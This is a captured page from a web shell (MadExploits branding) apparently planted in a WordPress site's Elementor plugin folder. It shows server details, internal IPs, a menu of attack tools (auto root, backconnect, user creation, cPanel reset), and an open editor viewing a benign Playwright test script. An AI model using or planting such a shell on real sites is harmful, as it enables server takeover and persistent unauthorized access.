Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
urlab /
wp-content /
plugins /
elementor /
[ HOME SHELL ]
Name
Size
Permission
Action
app
[ DIR ]
drwxrwxrwx
assets
[ DIR ]
drwxrwxrwx
core
[ DIR ]
drwxrwxrwx
data
[ DIR ]
drwxrwxrwx
includes
[ DIR ]
drwxrwxrwx
modules
[ DIR ]
drwxrwxrwx
vendor
[ DIR ]
drwxrwxrwx
vendor_prefixed
[ DIR ]
drwxrwxrwx
CONTRIBUTING.md
4.73
KB
-rwxrwxrwx
changelog.txt
326.55
KB
-rwxrwxrwx
elementor.php
3.74
KB
-rwxrwxrwx
eslint-local-rules.js
200
B
-rwxrwxrwx
license.txt
34.32
KB
-rwxrwxrwx
readme.txt
28.42
KB
-rwxrwxrwx
run-on-linux.js
1.11
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : run-on-linux.js
const { spawn, exec } = require( 'child_process' ); const packageJson = require( './package.json' ); function isDockerExist() { return new Promise( ( resolve ) => { exec( 'docker -v', ( error ) => { resolve( ! error ); } ); } ); } async function run( tag ) { const playwrightVersion = packageJson.devDependencies[ '@playwright/test' ]; const workingDir = process.cwd(); const command = 'docker run'; const options = [ '--rm', '--network host', `--volume ${ workingDir }:/work`, '--workdir /work/', '--interactive', process.env.CI ? '' : '--tty', ]; const image = `mcr.microsoft.com/playwright:v${ playwrightVersion.replace( '^', '' ) }-jammy`; const commandToRun = `/bin/bash -c "npm run test:playwright -- --grep="${ tag }""`; spawn( `${ command } ${ options.join( ' ' ) } ${ image } ${ commandToRun }`, { stdio: 'inherit', stderr: 'inherit', shell: true, } ); } ( async () => { if ( ! await isDockerExist() ) { // eslint-disable-next-line no-console console.error( 'Docker is not installed, please install it first.' ); process.exit( 1 ); } await run( process.argv.slice( 2 ) ); } )();
Close